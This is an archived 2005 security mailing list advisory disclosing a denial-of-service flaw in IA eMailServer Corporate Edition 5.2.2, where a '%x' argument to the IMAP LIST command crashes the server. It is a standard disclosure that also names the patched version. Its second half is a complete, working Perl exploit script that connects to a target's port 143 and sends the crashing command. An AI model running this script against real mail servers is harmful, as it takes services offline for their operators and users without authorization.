lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <80115b69050627010214178e81@mail.gmail.com>
Date: Mon Jun 27 13:02:48 2005
From: reedarvin at gmail.com (Reed Arvin)
Subject: Denial of Service Vulnerability in True North
	Software,
	Inc. IA eMailServer Corporate Edition Version: 5.2.2. Build: 1051.

Summary:
Denial of Service Vulnerability in True North Software, Inc. IA
eMailServer Corporate Edition Version: 5.2.2. Build: 1051.
(http://www.tnsoft.com/)

Details:
Input to the IMAP4 LIST command is not properly checked and/or
filtered. Issuing a single character '%x' as the second argument to
the LIST command will cause the MailServer.exe process to die.

Vulnerable Versions:
True North Software, Inc. IA eMailServer Corporate Edition Version:
5.2.2. Build: 1051.

Patches/Workarounds:
IA eMailServer Corporate Edition Version: 5.3.4. Build: 2019. is not
vulnerable to this attack. It is available at http://www.tnsoft.com/.

Exploit:
Run the following PERL script against the server. The process will die.

#===== Start IAeMailServer_DOS.pl =====
#
# Usage: IAeMailServer_DOS.pl <ip>
#        IAeMailServer_DOS.pl 127.0.0.1
#
# True North Software, Inc. IA eMailServer Corporate Edition
# Version: 5.2.2. Build: 1051.
#
# Download:
# http://www.tnsoft.com/
#
#############################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
				    PeerPort => "143",
				    Proto    => "TCP"))
{
	print "Attempting to kill IA eMailServer at $ARGV[0]:143...";

	sleep(1);

	print $socket "0000 LOGIN hello moto\r\n";

	sleep(1);

	print $socket "0001 LIST 1 \%x\r\n";

	close($socket);
}
else
{
	print "Cannot connect to $ARGV[0]:143\n";
}
#===== End IAeMailServer_DOS.pl =====

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)

Vulnerability discovered using PeachFuzz
(http://reedarvin.thearvins.com/tools.html)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ